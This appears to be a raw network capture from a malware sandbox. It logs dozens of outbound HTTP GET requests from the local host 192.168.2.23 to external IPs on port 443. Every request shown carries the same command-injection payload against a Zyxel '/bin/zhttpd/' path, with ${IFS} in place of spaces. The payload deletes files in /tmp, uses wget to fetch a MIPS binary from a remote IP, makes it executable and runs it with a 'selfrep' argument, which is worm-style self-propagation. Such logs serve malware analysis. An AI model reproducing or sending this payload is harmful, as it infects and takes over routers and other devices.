                                                Jan 28, 2024 10:16:24.800062895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4279192.168.2.234379262.207.69.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800071955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4280192.168.2.2351662109.169.220.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800081968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4281192.168.2.2349930103.119.37.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800138950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4282192.168.2.2345210182.142.247.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800149918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4283192.168.2.2339694219.46.208.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800194979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4284192.168.2.235731631.109.113.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800219059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4285192.168.2.233949681.178.115.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800240993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4286192.168.2.2351762136.56.73.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800262928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4287192.168.2.2352006120.36.37.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800285101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4288192.168.2.2333832108.197.122.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800328016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4289192.168.2.2341134123.234.219.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800345898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4290192.168.2.234982047.146.18.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800373077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4291192.168.2.2340926121.134.59.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800394058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4292192.168.2.236039657.200.12.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800427914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4293192.168.2.2355676112.163.133.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800446987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4294192.168.2.2359224194.120.220.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800462961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4295192.168.2.2343180114.2.193.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800498009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4296192.168.2.2347304135.86.186.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800546885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4297192.168.2.2348142113.198.136.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800570011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4298192.168.2.2343178132.31.83.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800582886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4299192.168.2.2343254212.163.79.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800635099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4300192.168.2.235122281.173.45.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800661087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4301192.168.2.2334430200.4.64.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800678968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4302192.168.2.234107882.168.64.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800702095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4303192.168.2.233658424.4.157.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800738096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4304192.168.2.233335432.217.70.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800755024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4305192.168.2.2353392150.220.98.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800787926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4306192.168.2.234097645.10.172.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800833941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4307192.168.2.2350876156.131.80.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800849915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4308192.168.2.2338658175.239.204.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800878048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4309192.168.2.2340660153.136.22.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800920010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4310192.168.2.2359652194.166.48.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800960064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4311192.168.2.2347286120.132.56.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800985098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4312192.168.2.2343258181.221.130.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801007032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4313192.168.2.2346920136.232.192.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801023006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4314192.168.2.2345152211.35.51.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801047087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4315192.168.2.23401525.175.166.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801074028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4316192.168.2.233604684.75.42.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801106930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4317192.168.2.235384434.117.25.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801136017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4318192.168.2.233923485.21.204.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801166058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4319192.168.2.233704654.10.88.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801203966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4320192.168.2.23590222.140.78.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801213980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4321192.168.2.2336224113.24.91.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801232100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4322192.168.2.234665095.40.182.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801285028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4323192.168.2.2352596188.58.113.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801306009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4324192.168.2.2338270189.144.163.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801327944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4325192.168.2.2349808102.47.92.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801367044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4326192.168.2.2352884193.94.254.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801414967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4327192.168.2.234959641.44.227.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801425934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4328192.168.2.234788064.182.208.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801448107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4329192.168.2.235380458.94.231.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801495075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4330192.168.2.2358036197.32.140.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801518917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4331192.168.2.2351462162.34.190.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801529884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4332192.168.2.233288269.180.196.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801559925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4333192.168.2.235347659.119.142.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801601887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4334192.168.2.235187657.1.163.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801616907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4335192.168.2.2334374217.72.237.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801634073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4336192.168.2.234202875.57.36.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801659107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4337192.168.2.233344685.240.56.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801685095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4338192.168.2.2349230185.9.126.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801727057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4339192.168.2.233804472.254.123.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.801753044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4340192.168.2.234346053.112.247.86443
                                                TimestampBytes transferredDirectionData
